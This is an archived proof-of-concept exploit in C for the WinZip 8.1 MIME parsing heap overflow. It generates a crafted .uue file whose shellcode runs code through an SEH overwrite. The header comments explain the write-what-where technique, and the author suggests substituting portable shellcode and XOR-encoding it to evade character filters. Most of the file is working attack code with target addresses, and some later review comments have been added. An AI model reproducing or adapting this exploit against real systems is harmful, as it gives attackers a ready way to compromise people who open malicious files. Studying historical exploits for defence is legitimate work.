
wz_ex.c

wz_ex.c
Posted Apr 15, 2004
Authored by snooq | Site angelfire.com

Proof of concept exploit for the WinZip32 MIME Parsing Overflow. Tested against WinZip 8.1 on Windows XP SP1 and Windows 2000 SP1. Instructions for use are included.

tags | exploit, overflow, proof of concept
systems | windows
SHA-256 | 8a7e5cb801e4ff9423fec6d0c994638590a6f7103e548f3888181d78cc1db3c2

wz_ex.c

/*
* Author: snooq [http://www.angelfire.com/linux/snooq/]
* Date: 14 April 2004
*
* This is a PoC exploit for WinZip32 MIME Parsing Overflow
* bug reported by iDefense on 27 February 2004.
*
* The original advisory is found here:
* http://www.idefense.com/application/poi/display?id=76
*
* This version is SP dependent becoz my idiotic shellcode
* uses hardcoded addresses.... =p
*
* So, test it locally only. Afterall, it's just a PoC rite?
* Nonetheless, it's possible to make it more portable by
* using a universal shellcode...
*
* but beware... chars like <>,.:;'"=[]\/ are filtered...
* so feel free to XOR it.. =p
*
* Notes
* =====
* 1) Tested against WinZip 8.1 on WinXP SP1, Win2K SP1 only
*
* 2) You need to first launch WinZip before you 'Open'
*
* 3) Double clicking the 'uue' won't work
* why so? go figure it out urself... =p
* once u know why... u'd then know how to fix it...
*
* Greetz
* ======
* # eugene, nam, jf, valmont and the rest..
* # sk, shashank + Security_Auditors folks...
* # iDefense folks... SiG^2 guys etc...
* # lastly.. Greg Hoglund for his 'Cross Page' stuffs... =p
*/

/*
* A snapshot of the 'crash'
* =========================
*
* Our buffer on the heap looks like this:
*
* [....AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEEEEEEEEEEEEEEE....]
* |--- heap grows this way --------->
*
*
* and the CPU is about to execute the following code:
*
* 0049BFFC |> 8B4C13 08 MOV ECX,DWORD PTR DS:[EBX+EDX+8]
* 0049C000 |. 8B7C13 04 MOV EDI,DWORD PTR DS:[EBX+EDX+4]
* 0049C004 |. 8979 04 MOV DWORD PTR DS:[ECX+4],EDI
* 0049C007 |. 8B4C13 04 MOV ECX,DWORD PTR DS:[EBX+EDX+4]
* 0049C00B |. 8B7C13 08 MOV EDI,DWORD PTR DS:[EBX+EDX+8]
* 0049C00F |. 035D F8 ADD EBX,DWORD PTR SS:[EBP-8]
* 0049C012 |. 8979 08 MOV DWORD PTR DS:[ECX+8],EDI
* 0049C015 |. 895D F4 MOV DWORD PTR SS:[EBP-C],EBX
*
* and, EBX register seems to be under our control... =p
*
* EDX = ptr to 'DDDD'
* EBX = 'DDDD' - 1
*
* By carefully choosing a value for EBX, we are able to manipulate
* ECX at 0049BFFC and EDI at 0049C000.
*
* If we set 'DDDD'=0xfffffff5 (-11),
*
* -> EBX would be '0xfffffff4' (-12)
* -> [EBX+EDX+8] becomes [EDX-4] and ECX = 'CCCC'
* -> [EBX+EDX+4] becomes [EDX-8] and EDI = 'BBBB'
*
* Effectively at 0049C004, we can write a DWORD 'BBBB' to ['CCCC'+4]
* After that.....
*
* -> [EBX+EDX+4] becomes [EDX-8] and ECX = 'BBBB'
* -> [EBX+EDX+8] becomes [EDX-4] and EDI = 'CCCC'
*
* Finally we reach MOV DWORD PTR DS:['BBBB'+8],'CCCC' at 0049C012..
*
* Choosing the rite values for 'BBBB' + 'CCCC', execution flow could
* be reliably diverted into our shellcode.
*
* In this exploit, I've chosen to install our code as the main thread's
* top exception handler so that when exception is triggered at 0049C012,
* our code will be called to 'handle' it... =p
*
* This is how I did it but I'm not sure if this is the best way.
* If you know of any other better way to exploit this.....
* pleaseeeeee tell me....... :)
*
*/

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

#define TARGET 1 /* default 1-based index into targets[]; argv[1] overrides it in main() */
#define NOP 0x90 /* x86 single-byte NOP; main() pre-fills the whole buffer with it */

/*
* Gap for NOPs (not really needed)
* Added to the shellcode placement offset in main().
*/
#define PAD 0

/*
* This 'RANGE' nonsense was useful
* in locating the 'index', i.e. 'DDDD'
*
* Byte span of candidate 'index' words written by filladdr(), 4 per
* candidate; at 1*4 the loop there runs exactly once.
*
* NOTE(review): RANGE, IDXOFF, OFFSET, SSIZE and HSIZE expand without
* enclosing parentheses. Every use in this file is additive or a plain
* comparison, so the expansions come out right here, but none of them
* is safe to embed in a multiplicative or unary context.
*/
#define RANGE 1*4

/*
* Where we control the 'index',
* i.e EBX register's value
* (offset relative to the end of 'header' inside buff)
*/
#define IDXOFF 268-RANGE+4

/*
* We find our 'where' + 'what' here...
* ('what' at OFFSET, 'where'-4 at OFFSET+4; see filladdr())
*/
#define OFFSET IDXOFF-8

/*
* -12 bytes from 'index' into where
* 'where'+'what' are...
* (this is the 'DDDD' = 0xfffffff5 value walked through in the header comment)
*/
#define INDEX 0xfffffff5

#define BSIZE 1024 /* total size of the generated file, see buildfile() */
#define FNAME "snooq.uue" /* output file name */
#define SSIZE sizeof(shellcode)-1 /* payload length without its NUL terminator */
#define HSIZE sizeof(header)-1 /* header length without its NUL terminator */

/* Image of the output file; main() and filladdr() assemble it in place. */
char buff[BSIZE];
/* Write target ('where') and value ('what'), selected from targets[] in main(). */
long where, what;

/*
* Per-target constants, indexed 1-based by main() as targets[t-1].
* Two entries only; nothing in this file range-checks the index.
*/
struct {
char *os; /* display name of the tested configuration */
long topSEH; /* becomes 'where'; filladdr() stores where-4 */
long jmpADD; /* becomes 'what'; filladdr() stores it as-is */
}

targets[] = {
{
"Window XP (en) SP1",
0x7ffddffe, // Per Thread Top SEH - 2
0xf27cffff // [this address + 4] -> shellcode
},
{
"Window 2000 (en) SP1",
0x7ffddffe, // Per Thread Top SEH - 2
0xf354ffff // [this address + 4] -> shellcode
},
}, v; /* 'v': a second instance of the same anonymous struct type; not referenced in this file */

/*
* Harmless payload that spawns 'notepad.exe'... =p
*
* Per the inline comments: builds "notepad.exe" on the stack, calls
* WinExec() on it, then ExitProcess(). "XXXX" and "YYYY" are 4-byte
* placeholders that filladdr() overwrites at run time with the addresses
* of WinExec() and ExitProcess() as seen by the generating process.
* The byte sequence contains no 0x00, which the NUL-terminated scan in
* filladdr() relies on.
*/

char shellcode[]=
"\x55" // push ebp
"\x8b\xec" // mov ebp, esp
"\x33\xf6" // xor esi, esi
"\x56" // push esi
"\x68\x2e\x65\x78\x65" // push 'exe.'
"\x68\x65\x70\x61\x64" // push 'dape'
"\x68\x90\x6e\x6f\x74" // push 'ton'
"\x46" // inc esi
"\x56" // push esi
"\x8d\x7d\xf1" // lea edi, [ebp-0xf]
"\x57" // push edi
"\xb8XXXX" // mov eax, XXXX -> WinExec()  (patched by filladdr)
"\xff\xd0" // call eax
"\x4e" // dec esi
"\x56" // push esi
"\xb8YYYY" // mov eax, YYYY -> ExitProcess()  (patched by filladdr)
"\xff\xd0"; // call eax

/* First bytes of the output file; main() copies it (without the NUL) to buff[0]. */
char header[]="Content-Type: multipart/mixed; boundary=";

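/*
* Print a message and terminate the process.
*
* s: message to print; must not be NULL.
*
* Reports on stderr and exits with a non-zero status so a caller or
* script can tell the run failed. The original printed to stdout and
* exited with 0, which made a failed run look like a success.
*/
void err_exit(char *s)
{
fprintf(stderr, "%s\n", s);
exit(EXIT_FAILURE);
}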

/*
* Patch the payload placeholders and store the control words in buff.
*
* Reads the globals 'where' and 'what' (set in main()), rewrites
* 'shellcode' in place, and writes into the global 'buff' at the fixed
* offsets derived from OFFSET / IDXOFF / RANGE. No arguments, no return.
*/
void filladdr()
{
char *ptr;
int i=0, index=INDEX, idxoff=IDXOFF;

/*
* The addresses are taken from the generating process itself, which is
* why the author calls the result service-pack specific: they only line
* up with the target if both processes map kernel32 at the same base.
*/
long addr1=(long)WinExec;
long addr2=(long)ExitProcess;

/* %08x with a long and %d with a ptrdiff_t below: fine on a 32-bit Win32 build, mismatched elsewhere */
printf("-> WinExec() is at: 0x%08x\n",addr1);
printf("-> ExitProcess() is at: 0x%08x\n",addr2);

ptr=shellcode;

/*
* Scan for the 4-byte "XXXX" / "YYYY" placeholders. Each iteration reads
* 4 bytes through a char buffer (unaligned, and char->long punning),
* which x86 tolerates but C does not guarantee. The loop stops at the
* first 0x00, so its last two iterations read up to 2 bytes past the end
* of 'shellcode' -- a buffer over-read.
*/
while (*ptr!='\0') {
if (*((long *)ptr)==0x58585858) { /* "XXXX" */
printf("-> Filling in WinExec at offset: %d\n",(ptr-shellcode));
*((long *)ptr)=addr1;
}
if (*((long *)ptr)==0x59595959) { /* "YYYY" */
printf("-> Filling in ExitProcess at offset: %d\n",(ptr-shellcode));
*((long *)ptr)=addr2;
}
ptr++;
}

/* 'what' at OFFSET and 'where'-4 at OFFSET+4: the 'BBBB' / 'CCCC' pair of the header comment */
ptr=buff+HSIZE+OFFSET;
printf("-> 'what' == 0x%08x at offset %d\n",what,OFFSET);
*((long *)ptr)=what;

ptr+=4;
/* NOTE(review): the message prints 'where', but the value stored is where-4 */
printf("-> 'where' == 0x%08x at offset %d\n",where,OFFSET+4);
*((long *)ptr)=where-4;

ptr=buff+HSIZE+idxoff;

/* One candidate 'index' word per 4 bytes of RANGE; with RANGE == 4 this runs once */
for (;i<RANGE;i+=4) {
printf("-> 'index' == 0x%08x at offset %d\n",index-i,idxoff+i);
*((long *)(ptr+i))=index-i;
}

}

/*
* Write the assembled global 'buff' to FNAME byte for byte and report it.
* Terminates through err_exit() if the file cannot be opened; the result
* of fclose() is not checked, as in the original.
*/
void buildfile()
{
FILE *out = fopen(FNAME, "w");

if (out == NULL) {
err_exit("-> Failed to generate file...");
}

/* One byte per call, for every byte of the buffer (not just up to a NUL). */
for (size_t pos = 0; pos < sizeof(buff); pos++) {
fputc(buff[pos], out);
}

fclose(out);

printf("-> '%s' generated....\n", FNAME);
}

/*
* Entry point: select a target, assemble the file image in buff, write it.
*
* argv[1] (optional): 1-based index into targets[]; defaults to TARGET.
* Returns 0. Failure to open the output file ends the process via err_exit().
* memset/memcpy are used without an explicit <string.h>; presumably it
* comes in through <windows.h>.
*/
int main(int argc, char *argv[])
{
int i=0, t=TARGET; /* 'i' is never used in this function */

/*
* NOTE(review): the atoi() result is not range-checked. targets[] has
* two entries, so any value outside 1..2 (including the 0 that atoi()
* returns for non-numeric input) indexes targets[] out of bounds below.
*/
if (argc==2) { t=atoi(argv[1]); }

where=targets[t-1].topSEH;
what=targets[t-1].jmpADD;

printf("\nWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\n\n");

/* Layout of buff: [header][NOP fill][control words from filladdr()][shellcode][NOP fill to BSIZE] */
memset(buff,NOP,BSIZE);
printf("-> Generating 'uue' file for target #%d...\n",t);
memcpy(buff,header,HSIZE); /* header copied without its NUL */
filladdr(); /* patches the placeholders in shellcode, stores 'what'/'where'/'index' in buff */
memcpy(buff+HSIZE+IDXOFF+4+PAD,shellcode,SSIZE); /* payload starts 4 bytes after the 'index' word */
buildfile();

return 0;

}




